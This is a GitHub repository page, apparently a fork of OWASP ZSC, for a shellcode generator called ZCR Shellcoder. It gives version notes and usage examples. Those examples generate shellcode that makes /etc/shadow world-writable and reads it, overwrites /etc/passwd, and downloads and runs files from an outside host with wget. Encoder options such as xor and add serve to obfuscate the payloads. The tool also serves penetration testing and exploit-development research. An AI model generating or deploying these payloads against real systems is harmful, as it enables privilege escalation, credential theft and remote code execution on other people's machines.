forked from OWASP/ZSC
-
Notifications
You must be signed in to change notification settings - Fork 0
ZeroDay Cyber Research - ZCR Shellcoder - z3r0d4y.com Shellcode Generator
License
idkwim/ZCR-Shellcoder
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
version 1.0.2: SKIP
[linux_x86 modules completed]
add script_executor() [linux - using command execution]
add download_execute() [linux_x86 - using command execution (wget)]
add download() [linux_x86 - using command execution (wget)]
add dir_create() [linux_x86 using command execution]
add file_create() [linux_x86 using command execution]
add encodes file for next version released
Examples:
>python shellcoder.py -os linux_x86 -encode none -job file_create('/root/Desktop/hello.txt','hello') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job file_create('/root/Desktop/hello2.txt','hello[space]world[space]!') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job dir_create('/root/Desktop/mydirectory') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job download('http://www.z3r0d4y.com/exploit.type','myfile.type') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type') -o file.txt
#multi command
>python shellcoder.py -os linux_x86 -encode none -job download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]777[space]myfile.type;sh[space]myfile.type') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job script_executor('script.type','D:\\myfile.type','./script.type') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job script_executor('ali.py','/root/Desktop/0day.py','chmod[space]+x[space]ali.py;[space]python[space]ali.py') -o file.txt
Note: Remember don't use " " and replace it with "[space]"
Note: script_executor(),download_execute(),download(),dir_create(),file_create() are using linux command line , not the function. [wget,mkdir,echo]
version 1.0.1: BOILING_POINT
add system() [linux_x86 command execute]
fixed chmod filename 1/4 char length [linux_x86]
fixed exec filename 1/4 char length [linux_x86]
fixed write filename 1/4 length [linux_x86]
fixed write content 1/4 length [linux_x86]
fixed write length calculator [linux_x86]
and fixed some other bugs in coding [core]
Examples:
system() function added in script, you can use it to do anything and generate any command line shellcode.
Note: Don't use space ' ' in system() function, replace it with "[space]" , software will detect and replace " " for you in shellcode.
>python shellcoder.py -os linux_x86 -encode none -job system('ls') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job system('ls[space]-la') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job system('ls[space]-la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job system('wget[space]file;sh[space]file') -o file.txt
version 1.0.0: ASIIN_BLUE_RUBY
add chmod() [linux_x86] -> chmod('/path/file','perm_num')
add write() [linux_x86] -> write('/path/file','content')
add exec() [linux_x86] -> exec('/path/file')
add encode [none - all os]
Examples:
>python shellcoder.py -h
Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-update => check for update
>python shellcoder.py -oslist
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64
>python shellcoder.py -joblist
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')
>python shellcoder.py -types
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all
Generating shellcodes , using functions:
>python shellcoder.py -os linux_x86 -encode none -job chmod('/etc/shadow','777') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job write('/etc/passwd','user:pass') -o file.txt
>python shellcoder.py -os linux_x86 -encode none -job exec('/bin/bash') -o file.txt
Note: exec() doesn't support any ARGV same as exec('/bin/bash -c ls') or exec('/bin/bash','-c','ls'), you have to wait for next version and this feature will available in system()
About
ZeroDay Cyber Research - ZCR Shellcoder - z3r0d4y.com Shellcode Generator
Resources
License
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published
Languages
- Python 100.0%